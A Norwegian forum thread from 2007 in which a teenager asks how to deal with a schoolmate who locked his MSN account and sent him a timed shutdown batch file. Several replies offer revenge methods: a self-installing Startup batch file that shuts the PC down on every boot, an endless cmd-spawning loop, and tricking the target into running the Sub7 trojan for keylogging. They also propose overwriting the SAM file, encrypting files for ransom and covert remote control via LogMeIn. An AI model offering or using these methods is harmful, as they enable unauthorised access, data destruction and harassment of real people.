Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  69 5526
En bekjent spurte om jeg ville se noe kult, og jeg sa "ok". Så gikk det noen sek, så sa han "Sjekk innboksen din". Jeg prøvde, men det sto noe om at det ikke gikk. (Kanskje pga. for mange mislykkete påloggingsforsøk? Nå prøver han febrilsk å få meg til å logge av, og sier han gleder seg til i natt når jeg logger av. Jeg har ingen planer om å logge av, og står ofte som "Borte" om natta. Han sier til meg at med en gang jeg logger av vil jeg aldri få muligheten til å logge på med den adressen igjen, så han håpte for min egen del at jeg hadde backupadresse. Vet noen hvor realistisk dette er, og evt hva han har gjort for å få det til? Noe jeg kan gjøre i gjengjeld?

[COLOR=Red]Edit: Det går forresten an å sjekke innboks nå, men jeg mener jeg har hørt om sånne program som kan blokkere andres adresser. Er det sant? Noen måte å forhindre et slikt program?[/COLOR]
Sist endret av Realist1; 21. april 2007 kl. 00:36.
m0b
m0b's Avatar
DonorAdministrator
Etter hva jeg kan erindre bli kontoen din kun stengt i x antall timer. Så veldig farlig tror jeg neppe det kan være. Hvorfor skal du på død og liv gjøre noe tilbake? Kan du ikke ta det opp med ham ansikt til ansikt? Det vil du til syvende og sist bli nødt til å gjøre når du blir eldre, så hvorfor ikke begynne med det allerede nå?
Ta kontakt med foreldra hans, for det han gjør (hva enn det nå er) er uansett ikke lov
Han har brukt programmet Icecold Reloaded.
Du kan laste det ned her:
http://rapidshare.com/files/13127997...oaded.zip.html

Bare si til han at du freezer hans msn om han gjør det med den. Fair er fair..
Takker.
Her er meldingen jeg får:


Kode

Påloggingen mislyktes. 
 

Du har prøvd å logge på for mange ganger med feil e-postadresse eller passord, eller noen andre prøver å logge på kontoen xxx@hotmail.com.
Fikk nå en fil av ham. Jeg trenger virkelig mailen min til i kveld, noe som er viktig og angår flere saker, langt viktigere enn meg og ham. Han skjønte (kanskje?) det, og sendte meg en .zip-fil, som han kalte "unnfreezing-kode". Den heter "kode.bat" når jeg åpner den i WinZip, men vet ikke om jeg skal Unzippe den enda. Type: "MS-DOS satsvis fil". Noen som vet hva DETTE er?
m0b
m0b's Avatar
DonorAdministrator
Høyreklikk på bat-fila han har sendt deg, gå deretter inn på rediger. Da får du innholdet i fila. Kopier innholdet og post det hit. Så skal vi nok forklare deg hva den gjør.
Ikke start filen han har sendt. Trykk høyre museknapp og rediger. Post innholdet i textfilen som kommer opp.

Edit: for sen
Pittelitt for sent. Han ga meg sitt ord på at den var trygg, og at han skulle fjerne frysninga når jeg hadde åpnet den og sett på den. Det er en som avslutter hele dataen med en tidsfrist på 10 minutter. Hva kan jeg gjøre for å stoppe denne? 4 minutter igjen til 0.

Nå sier han forresten at jeg var dum som gikk på den, og at han var helt ærlig, men han sa ikke NÅR han skulle fjerne frysninga.

A sier:
om 10 min logges du av
A sier:
inkludert pcen
D sier:
Håper den e fjernet når eg logger på igjen
A sier:
og ja
A sier:
håper? hahaha
A sier:
gjett om dette blir gøy
A sier:
..for meg
A sier:
ble du lei deg nu? =/
A sier:
husk å lagre alle viktige dokumenter
shutdown -a i kjør
Du er FAEN meg en engel! ELSKER DEG
ingen problem, må gjerne gi kvalitetspoeng
Lur han og si at du mistet en del viktige dokumenter.
Sitat av Acin
ingen problem, må gjerne gi kvalitetspoeng
Vis hele sitatet...
Done, thank you!
Her er forresten koden jeg fikk i filen:

Kode

shutdown -s -t 600 -c "Festlig?"
Kan noen forklare meg hvordan slike virker og hvordan jeg lagrer og sender?
m0b
m0b's Avatar
DonorAdministrator
Det er en vanlig windows kommando. Verken mer eller mindre. Gå i kommandolinja og skriv "shutdown /?" så får du en beskrivelse av kommandoen. Skriv inn i en tekstfil og navngi den .bat i stedet for .txt.
Takker.
Jeg latet som jeg hadde 40 sek igjen og han sendte meg en kode 2, og det var denne shutdown -a
Dersom jeg forblir pålogget kan jeg ikke late som ejg mistet viktige dokumenter, men vil ikke logge av for da kommer jeg meg ikke på igjen

Vet noen om et slikt unfreezing-program? [COLOR=Red]Edit: Har hørt det er like lett å unfreeze sin egen konto som å freeze an annens konto.[/COLOR]
Håper jeg ikke plager noen med alle mine spørsmål nå, men jeg prøver å holde meg til én tråd, og beklager at jeg spør så masse, men dette vil jeg rydde opp i. Han er grei på skolen og irl, men et helvete og en jævel på msn.
Sist endret av Realist1; 21. april 2007 kl. 01:50.
Nei, du må vente til han slutter å freeze kontoen din, den blir opplåst en halvtime etter at han avslutter programmet.

Men du kan freeze hans konto til han slutter med din ved hjelp av IceCold reloaded
m0b
m0b's Avatar
DonorAdministrator
Det er allerede en del tråder om "msn freze" og slikt her på forumet. Mulig du finner noe fornuftig om du søker litt.
Sitat av Dably II
Done, thank you!
Her er forresten koden jeg fikk i filen:

Kode

shutdown -s -t 600 -c "Festlig?"
Kan noen forklare meg hvordan slike virker og hvordan jeg lagrer og sender?
Vis hele sitatet...
Sure thing.
Bat er den letteste måten å lage """virus""" på...
Eller ihvertfall en måte å skade pcen på.
Først må du slå av "Skjul filetternavn for kjente filtyper" i min datamaskin - Verktøy - etellerannet.
Så lager du et nytt tekstdokumenter og fjerner .txt og skriver .bat istedenfor (og kall den hva du vil - før .bat)
Så høyreklikker du den og trykker på rediger.
Dermed skriver du inn de kodene du vil ha - fra ms-dos.
Noen kjente koder:
Start
Shutdown
Time

Også kan du evt søke på google
Hvis du for eksempel vil lagge en "spamme-kode" Skriver du bare:
Start start cmd.exe

Velbekomme (:
Sitat av Dably II
En bekjent spurte om jeg ville se noe kult, og jeg sa "ok". Så gikk det noen sek, så sa han "Sjekk innboksen din". Jeg prøvde, men det sto noe om at det ikke gikk. (Kanskje pga. for mange mislykkete påloggingsforsøk? Nå prøver han febrilsk å få meg til å logge av, og sier han gleder seg til i natt når jeg logger av. Jeg har ingen planer om å logge av, og står ofte som "Borte" om natta. Han sier til meg at med en gang jeg logger av vil jeg aldri få muligheten til å logge på med den adressen igjen, så han håpte for min egen del at jeg hadde backupadresse. Vet noen hvor realistisk dette er, og evt hva han har gjort for å få det til? Noe jeg kan gjøre i gjengjeld?

[COLOR=Red]Edit: Det går forresten an å sjekke innboks nå, men jeg mener jeg har hørt om sånne program som kan blokkere andres adresser. Er det sant? Noen måte å forhindre et slikt program?[/COLOR]
Vis hele sitatet...
Jeg ville tatt på meg den spisseste støvelen jeg hadde å gitt han et tupp i ræva !!
Skjønte det nå, men skjønte ingenting. :P
Sist endret av Realist1; 21. april 2007 kl. 02:47.
Hvis du vil være en ekte djevel igjen mot vedkommende kan du sende han en fil som skriver en .bat fil i oppstartsmappen hans med en "shutdown -f -t 0" samt at koden sletter fila den komfra og så kjører den batfilen den opprettet =)

Så får han vite hvordan det er å bli herset med
Du får finne frem teskjeen, og forklare meg
skriv cmd først og etter det skriver du shutdown /?
Altså: Skriv cmd også shutdown - I kjør, ikke .bat-filen >.<
Uff. Funket med "cmd shutdown /?" et lite æyeblikk, og jeg fikk opp denne svarte vinduet som jeg har sett så mange ganger før, men ikke vet navnet på. Det gikk imidlertid bare 2 sekunder (ca.) før jeg fikk opp en liten feilmelding om at programmet måtte lukkes. Vet noen hva det skyldes? Her er fielmeldingen:
Tittel: "16-biters MS-DOS-delsystem"

Kode

C:\WINDOWS\system32\cmd.com
NTVDM CPUen fikk en ugyldig instruksjon.
CS:06bf IP:e7e7 OP:63 b7 14 00 00 Velg 'Lukk' for å avslutte programmet.
Muligheter: 'Lukk' og 'Ignorer'

Kode

copy navnetpåfilen.bat C:\"Documents and Settings"\"All Users"\Start-meny\Programmer\Oppstart
shutdown -s -t 1
lag en batfil og putt dette inn i den. Husk å kalle filen for det samme som som du skriver etter copy

Denne filen vil legge seg selv i oppstarten og slå av pcen hver gang den blir startet.
Vil du være gud over pcen hans og få fyren til å tilbe deg?... PM me
Takk for all hjelp. Som den nooben ejg er har jeg fremdeles litt problem med å skjønne alt, men jeg verdsetter tipsene dere har gitt.

Ellers lurte jeg på om dere hadde noen artige, men ufarlige triks, som f.eks. kan brukes på skolens pc'er. Av typen (Ctrl + Piltast). Den er en slager på skolen, men det er nå så vanlig at alle vet hvordan man takler den. Det var også en som endret BIOS-passordet til den ene maskinen, så under oppstarten måtte man taste inn "Kebab" før man kunne logge inn på vanlig måte. Flere slike triks?
NOOOOOOOOOOOOOOOOOO-
robhol's Avatar
Ta å gi den jævla drittsekken en skikkelig en på trynet fra meg er du snill?
Den VERSTE typen folk jeg vet om.

Edit; for en litt mindre "voldelig" måte å tra igjen på, google "Sub7" eller "SubSeven" og få ham til å kjøre "server.exe". IKKE kjør den selv. Etterpå kan du kontrollere pc'n hans, logge alt han skriver, så du kan grave fram masse dritt og vise rundt på skole, henge det opp på den lokale utklippstavlen etc etc..
Du eier pc'n hans, bare ikke fysisk
Sist endret av robhol; 21. april 2007 kl. 22:40.
Det er vel ganske ulovlig? Og ikke minst til og med risikabelt for min egen del? Følger vel med masse drit med et sånt program?
Alle antivirusprogram med respekt for seg selv blinker som juletrær hvis det kommer noe som minner om Sub7 inn på PC-en.
Sitat av robhol
Edit; for en litt mindre "voldelig" måte å tra igjen på, google "Sub7" eller "SubSeven" og få ham til å kjøre "server.exe".
Vis hele sitatet...
Som om det er mulig.
Alt av brannmurer, antivirus og antispyware blokkerer subseven.
Du skal være god for å klare å kjøre den på en pc du fysisk kontrollerer.
Nå skal det sies at det finnes ganske mye annet rart en bare Subseven, og disse er også gjerne bedre. Hvis du på død og liv skal bruke slike programmer. Men som nevnt tidligere, de fleste virusprogrammer sier rikelig i fra.

Jeg foreslår derimot at du prøver å få fysisk tilgang til PC-en hans og skriver over SAM fila, enten med noe random eller noe du selv velger. Du vil da gjøre det relativt umulig for ham å klare å logge seg på igjen (med mindre han selv fikser det på samme måten som du gjorde). Noe annet jeg synes du godt kan gjøre som en hevn er å kryptere noen av filene hans, og nekte å gi ham passordet bør han trygler eller noe. Bør kanskje vente med dette til det han gjør nå mot deg er glemt, og han aner fred og ingen fare.
Har vel egentlig ikke skrevet at jeg har lyst til å hevne meg eller noe sånt, men kjekt med tips :P
Keep em coming, thanks
[quote=Dably II]...........Vet noen hvor realistisk dette er, og evt hva han har gjort for å få det til? [COLOR=Red]Noe jeg kan gjøre i gjengjeld?[/COLOR]

[/dit: QUOTE]
Sitat av Dably II

A sier:
om 10 min logges du av
A sier:
inkludert pcen
D sier:
Håper den e fjernet når eg logger på igjen
A sier:
og ja
A sier:
håper? hahaha
A sier:
gjett om dette blir gøy
A sier:
..for meg
A sier:
ble du lei deg nu? =/
A sier:
husk å lagre alle viktige dokumenter
Vis hele sitatet...
jævla møkkaunge.
Neste gang du har fysisk tilgang til pc'en hans. Så legg datan hans til på DIN www.logmein.com bruker
Da vil du kunne sitte hjemme på din egen pc, og skifte Windows passord, styre musen hans og tastaturet. Nekte han å styre musen og tastaturet: d: han må sitte å se på at den lille søte pilen på skjermen surrer rundt og lager kaos.
Du kan skaffe han en "whitescreen" og lage kaos på datan hans uten at han kan se det. Også lar du han få se skjermen igjen etterpå

- Kanskje litt dårlig forklart. Men sjekk www.logmein.com for info
Å jeg har nesten lyst til å spør om adressen hans, og plage fyren litt.

Hadde noen gjort slik med meg hadde jeg fucka enda mer med fyren tilbake. Er litt vanskelig å lure ham nå, men neste gang dere prater og han har (mest sannsynlig) glemt det, lag en fil som windows trenger for å kjøre, legg inn litt ekstra kode som fucker opp pcen, send filen og be ham kjøre det. Si det er et tøft-spill.
Fyren er jo klart en liten scriptkiddie. Er ingen seriøst "IT-eksperter" som driver å sender bat-filer over msn med mål for hjertet å starte shutdown-programmet til Windows.

Jeg tror det er trygt å si at du ikke har særlig å frykte fra denne fyren, han har kanskje klart å google seg frem til visse opplysninger og programmer der man skriver inn ip'adresse til 'målet' og trykker på "Hack"-knappen, men dypere IT-forståelse har han tvilsomt.
Legg inn dette i en bat fil å send den til han

Kode

:loop
start
goto loop
Den starter CMD et uendelig antall mange ganger
Er ikke redd for ham, han får grisebank på skolen hvis han gjør noe. Vi er egentlig venner skjønner du, men han er bare så forbanna støgg på MSN.. Men takk for all hjelp, keep em comin
Jeg foreslår at du bruker det gode gamle hammer/slegge-trikset. Løp inn til han og knus PC-en.
Vil anbefale for de som er intresert i Command Prompt/CMD, og ta en titt på:
http://www.ss64.com/nt/
Hørest ut som en idiot, gi ham en trojan, eller pryl ham.
Altså, jeg tror nok heller ikke jeg har noe å frykte fra ham. Delvis fordi han vet at ejg kan gjøre mer skade på ham enn omvendt (i flere forstander). Dessuten så kan han nok ikke så mye. Og som sagt, så er vi venner, og også derfor gjør han nok ikke noe alvorlig på meg, og jeg heller ikke på ham. Tenk nå selv. En kompis av deg kødda med deg og blokkerte MSNen din. Hvordan ville du reagert? Nei, du ville ikke griseklikka og hacket ham og anmeldt ham og banket ham og slikt, men du ville heller ikke bare sittet der pal i timesvis uten å gjøre noe med det, helt uskyldig, og ventet til han var ferdig. Hva ville du gjort om det var din egen venn?
NOOOOOOOOOOOOOOOOOO-
robhol's Avatar
Sitat av Dably II
Hva ville du gjort om det var din egen venn?
Vis hele sitatet...
Jeg hadde ganske brått sluttet å regne ham som noen venn. VENNER skal liksom ikke gjøre sånt.
Sitat av dosky
Hvis du vil være en ekte djevel igjen mot vedkommende kan du sende han en fil som skriver en .bat fil i oppstartsmappen hans med en "shutdown -f -t 0" samt at koden sletter fila den komfra og så kjører den batfilen den opprettet =)

Så får han vite hvordan det er å bli herset med
Vis hele sitatet...
Er det ingen måte å rette opp i denne "feilen" på ?
eks: hvis noen sendte den til meg da vil jo jeg aldri kunne slå på dataen da?
Etter å ha lest hva han gjorde hørest det ut som din verste fiende, ikke noen venn.

Junkpal: Sikkerhetsmodus vil jeg tro er en sikker vinner.
▼ ... over en måned senere ... ▼
Nei, du ville ikke griseklikka og hacket ham og anmeldt ham og banket ham og slikt
Vis hele sitatet...
Jo, jeg hadde ommøbelert ansiktet hans.